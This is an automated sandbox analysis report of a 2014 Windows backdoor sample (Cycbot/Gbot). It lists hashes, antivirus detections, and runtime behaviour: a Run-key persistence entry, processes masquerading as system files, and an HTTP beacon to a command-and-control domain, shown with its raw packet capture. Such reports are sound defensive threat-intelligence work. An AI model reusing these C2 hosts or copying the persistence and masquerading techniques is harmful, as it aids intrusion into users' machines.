Analysis Date2014-11-22 16:27:01
MD51b385249a81828d762c778c477cc616c
SHA1a183990bc8ee8ef558f43347b6e8424ed3b3faf9

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 97b1acd734fa777ef527a201e0d4c878 sha1: cb44c4beb0365d2bf51c0135e396b606d9accf47 size: 96768
Section.rdata md5: 896afadb98774e40c47e4b30d77ee868 sha1: 186fec75446e2b1c8b0dab57de26445d2ad62ef8 size: 2048
Section.data md5: 999bde1aabd3a862a98f3dff011e74d7 sha1: 392c90a9fa12375328162307b3e3bff1f94f3efa size: 57344
Section.isete md5: c626f8cdc2fa09f4754858dc28c86e08 sha1: abcbaa5934dcb99b5b4f1c4b389dbf6236cfa468 size: 1024
Timestamp2005-11-14 08:50:38
VersionProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1532
PEhashd9638a5e7e6f8519d2cf3ee02b8d2a68409c91d7
IMPhash598e6bc96006455052474510d3f6220a
AV360 SafeBackdoor.Bot.137163
AVAd-AwareBackdoor.Bot.137163
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.G.gen!Eldorado
AVAvira (antivir)BDS/Gbot.aida
AVBullGuardBackdoor.Bot.137163
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-316
AVDr. WebBackDoor.Gbot.21
AVEmsisoftBackdoor.Bot.137163
AVEset (nod32)Win32/Kryptik.LZI
AVFortinetW32/FraudLoad.MK!tr
AVFrisk (f-prot)W32/Goolbot.G.gen!Eldorado
AVF-SecureBackdoor.Bot.137163
AVGrisoft (avg)Cryptic.CMZ
AVIkarusBackdoor.Win32.Gbot
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.aid
AVMalwareBytesTrojan.Agent
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Backdoor.Bot.137163
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SMX
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSbigmusicarchive.com
Winsock DNS127.0.0.1
Winsock DNSnationsautoelectric.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSnationsautoelectric.com
Type: A
98.139.135.198
DNSbigmusicarchive.com
Type: A
HTTP GEThttp://nationsautoelectric.com/images/50-217-1_F_2_.jpg?v61=87&tq=gHZutDyMv5rJejDia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 98.139.135.198:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 35302d32   GET /images/50-2
0x00000010 (00016)   31372d31 5f465f32 5f2e6a70 673f7636   17-1_F_2_.jpg?v6
0x00000020 (00032)   313d3837 2674713d 67485a75 7444794d   1=87&tq=gHZutDyM
0x00000030 (00048)   7635724a 656a4469 61396e72 6d736c36   v5rJejDia9nrmsl6
0x00000040 (00064)   6769577a 2532424a 5a625679 41253344   giWz%2BJZbVyA%3D
0x00000050 (00080)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 6e617469 6f6e7361 75746f65   st: nationsautoe
0x00000080 (00128)   6c656374 7269632e 636f6d0d 0a416363   lectric.com..Acc
0x00000090 (00144)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000000a0 (00160)   67656e74 3a206d6f 7a696c6c 612f322e   gent: mozilla/2.
0x000000b0 (00176)   300d0a0d 0a                           0....


Strings
.
.
P...u
.
..6
...$
1..$y.L.I.
P.c
..im
.rB
o
....
<
E/,C....#w...;.,....
..<F...zsP
B.......l...
040904b0
1.0.0.3
1532
CAF&
FileVersion
jjjjjj
PQs""
PrivateBuild
ProductVersion
%R0a
&Rsf
$%S$
s&@$dp
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
1=0\Dq
\1Ana=dI
1#gx7|
:2<=yE(
3\>j[E
>4Qr]ZT`Q
4wfT"=
/4&=x,
&5vAT;
{6CG0/
-6u+8y
77?hy%
7)F!	t
7g-<t9
7h" 6*h
&#\7]U
8P\?HE
A`3I+;
;AaFd;
AdHHvM
ADVAPI32.dll
aewCC!
<A.KR,
a_q	{b
A^v]}G
b$G(T.
BvR?im
CharNextW
CharUpperW
cJO|!U
CoCreateInstance
CoInitialize
CoRegisterClassObject
CoRevokeClassObject
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
CoUninitialize
CreateFileMappingW
CreateStdAccessibleObject
d4z	=-T%
@.data
DispatchMessageW
+dNQz#{`
dQf@47
E6gte!O-D
	ED\CS0
;>ekC7
+E!"n3_
EnumResourceNamesA
es?G	"
f7vg:Q
FillConsoleOutputCharacterA
FindClose
FreeEnvironmentStringsW
fwhY,e
Fy,d#+k
fZJ&&t^
-G!96T.&
GetACP
GetCPInfo
GetLastError
GetMessageW
GetModuleHandleW
GetProcessWorkingSetSize
GetTickCount
 Gf8<}
GlobalAlloc
GlobalFree
GXZZCJ
h3(gR-
H5d]4;n_T
H8Hw'iP
ha3}Gc*
%<i![+
_I5S~V
^IAI|4
I[(bB@
i*B<w|
Ik [WE
iKYiYI,
InitializeCriticalSection
I:O6l	2
.isete
|I	=t3
iXrApi
 >	 J1
[.jBu<
j.Lj7V	8
/jNl)<
jVx([.}r
j)Ya8]
;K*[8nK=4
KClAl<
KERNEL32.dll
KillTimer
kJHHws
^Kjswdy
k?li[N
K}%ovg	[
kVIO<#
*:_kw]
Kw`VHC-_2
<K.z'RX)
#	L5U0
l>Hh5Z
LockResource
LresultFromObject
lstrcmpiW
lstrcpyA
lstrcpyW
lstrlenW
LX$:(%
_mf5hi
MultiByteToWideChar
MX9wZ8q
:NBAv	_/WW
N`$<#kYSp
nMQ1h?
no-uBK
/N?.>)P
nu&,$`
nVyEM\
ole32.dll
OLEACC.dll
#*OrbTr
OutputDebugStringW
oV8.@}+uZ/
{p8~!3v
PathCombineW
PathFileExistsW
#_?pHR
PostThreadMessageW
"P=xbx
?]}]Q~
/!Q.ai
>qjD+}
+QP.Pz
r2C*/8j
`.rdata
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegDeleteValueW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegSetValueExW
rFy(9wvl{C
r* HEy
rJs&5n
^R*PKsLN`
r?r/F]
+rSih<%
}*+;^s
Sc`5h.
"sdy}@
SetTimer
SHLWAPI.dll
StringFromCLSID
StringFromGUID2
TF8&bO
!This program cannot be run in DOS mode.
TOYA?,
TranslateMessage
TscFoH
Tt3N&E
/u6d*q
uJ5k8tO
UnregisterClassA
uO5l(B
UpdateWindow
U}q*Eo
USER32.dll
v^w7W]
Vws] `T
w1p6@2r
W8{KANAR
Wc+BaN
WideCharToMultiByte
WJ{h1%
?wMT6s
<\W,N%
WO|-Ju
wsprintfW
~xfgMf
x[	ihj/
X,mvWVfE
?Y<9NH 
Yo_Hebf
Y:Oo	Q
y[s)PA`
@yWZa:
zJl&K`